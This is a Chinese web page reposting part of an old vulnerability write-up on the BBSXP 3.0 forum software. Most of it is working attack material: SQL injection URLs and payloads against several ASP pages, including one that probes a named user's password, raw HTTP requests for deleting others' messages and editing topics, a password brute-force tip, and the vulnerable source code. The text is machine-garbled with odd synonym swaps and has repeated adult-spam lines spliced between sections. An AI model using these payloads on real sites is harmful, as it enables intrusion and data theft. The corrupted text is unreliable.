设为主页 | 加入收藏 | 繁體中文
当前位置:首页 > 新闻中心 > 行业资讯 > 电脑研究 > 漏洞研究

BBSXP3.0若干问题总结


  测试二:
  vote.asp毛病
  http://www.xxx.com/bbsxp2004/bbsxp/...d=4%20and%201=2
  OK又一个毛病,我们可以先提倡一个投票,然后本身投票后,然后检察投票效果,就可以注射了
  http://www.xxx.com/bbsxp2004/bbsxp/...?menu=post&id=4
  这里也可以注射,投票的时候。
  趁便一说ID是你发的帖子号,由于BBSXP样式发生了点变化以是鼠标挪动到帖子上的时候不会表现URL连接
  只需要点中鼠标不放到帖子上面,就可以看到上面的URL了
  http://bbs.yuzi.net/vote.asp?menu=p...00753%20and%200<>(select%20count(*)%20from%20user%20
  where%20us
  ername='yuzi'%20and%20len(userpass)=32)
  AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**
  AV女优AV女优AV女优**
  测试三:
  可穷举加密论坛暗码问题
  http://www.xxx.com/bbsxp2004/bbsxp/...d=2&pass=111111
  精确便间接进入了
  AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**
  AV女优AV女优AV女优**
  测试四:
  messanger.asp问题可以删除任何人消息!~
  if Request("menu")="del" then
  if isnumeric(""&Request("id")&"") = flase then
  error("
  合法xx作")
  end if
  conn.execute("delete from [message] where id="&Request("id")&" and
  incept='"&Request.Cookies("username")&
  "'")end if
  POST /bbsxp2004/bbsxp/message.asp?menu=del&id=4 HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/
  vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
  Referer:http://www.xxx.com/bbsxp2004/bbsxp/message.asp
  Accept-Language: zh-cn
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
  Host: www.xxx.com
  Connection: Keep-Alive
  Cookie: eremite=0; username=yuzi; userpass=; now=2003%2D10%2D17+15%3A31%3A55;
  ASPSESSIONIDASCASSTA=HIIHHCJ
  DFHBOADOIEAHCBHOH; onlinetime=2003%2D10%2D17+15%3A27%3A32; addmin=10
  AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**
  AV女优AV女优AV女优**
  测试五:
  edittopic.asp问题 ------->当3.0正式版呈现后此问题曾经修补,开始测试是用的BETA版本
  POST /bbsxp2004/bbsxp/EditTopic.asp?id=11&topic=[讨论] HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/vn
  d.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
  Referer:http://www.xxx.com/bbsxp2004/bbsxp/...sp?id=11&;topic=[讨论]
  Accept-Language: zh-cn
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
  Host: www.xxx.com
  Content-Length: 68
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: eremite=0; now=2003%2D10%2D17+16%3A13%3A59;
  ASPSESSIONIDASCASSTA=FNIHHCJDJFIMGILIEOIBLAAC; onlinetime=2003%2D10%2D17+16%3A09%3A20;
  username=yuzi; userpass=; addmin=10
  content=test11111111111111111111111&submit1=%C8%B7%B6%A8%B1%E0%BC%AD
  AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**
  AV女优AV女优AV女优*
  测试六:
  faction.asp问题,创建一个帮派先(固然要有充足经验和.....啦,没有怎样办?呵呵,用别人创建的嘛),
  然后当浏览帮派信息的时候就可以注射了
  http://www.xxx.com/bbsxp2004/bbsxp/...d=1%20and%201=1
  参考代码部分:
  elseif Request("menu")="look" then
  sql="select * from faction where id="&Request("id")&""
  rs.Open sql,Conn
  %>
  编辑帮派的时候也可以注射
  AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**
  AV女优AV女优AV女优
  测试七:
  searchok.asp问题
  count=conn.execute("Select count(id)from forum where deltopic<>1 and "&forumidor&" "&item&"
  "&TimeLimit&
  "")(0)sql="select * from forum where deltopic<>1 and "&forumidor&" "&item&" "&TimeLimit&" order
  by lastt
  ime Desc"rs.Open sql,Conn ~~~~~
  if Request("search")="author" then
  item=""&searchxm&"='"&content&"'" -------------B
  elseif Request("search")="key" then
  item=""&searchxm2&" like '%"&content&"%'"
  end if
  content=Request("content") ----------呵呵,
  来http://www.xxx.com/bbsxp2004/bbsxp/search.asp 搜索要害字位置举行注射
  yuzi' and 0<>(select count(*) from user) and '1'='1 条件成立便会表现出作者,不然是500或表现没有
  找到您要查
  询的内容
  测试八:
  new.asp问题
  http://www.xxx.com/bbsxp2004/bbsxp/...mid=1%20and%200<>(select%20count(*)%20from%20use
  r)
  document.write(' [讨论] [2003-10-18 12:13:48]
  ');document.write(' [讨论] [2003-10-17 13:11:10]
  呵呵,前往了
  看看代码很显然了:)
  if Request("forumid") = "" then
  sql="select top "&TopicCount&" id,icon,topic,lasttime from forum where
  deltopic=0 order
  by id desc"
  else
  sql="select top "&TopicCount&" id,icon,topic,lasttime from forum where
  forumid="&Reques
  t("forumid")&" and deltopic=0 order by id desc"
  end if
  rs.open sql,conn
  do while Not RS.Eof
  测试九:
  颠末检察数据库发明加密论坛暗码是明文,这样共同SQL INJECTION就可以很轻松拿到暗码了:)
  现在就只测试了这些,都是些小问题(针对ACCESS来说,如果是MSSQL大概危害就大点了),要害是怎样进后台,对
  于暴力破解的确不值得提倡.:)只管ACCESS突破后台麻烦点,至于要领嘛,各人慢慢总结吧:)GOOD LUCK
 

上一页12下一页

    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码:
  
上一篇: Garden的安全性及常见问题
下一篇: 什么是堵塞”(Logjam)漏洞“?

友情链接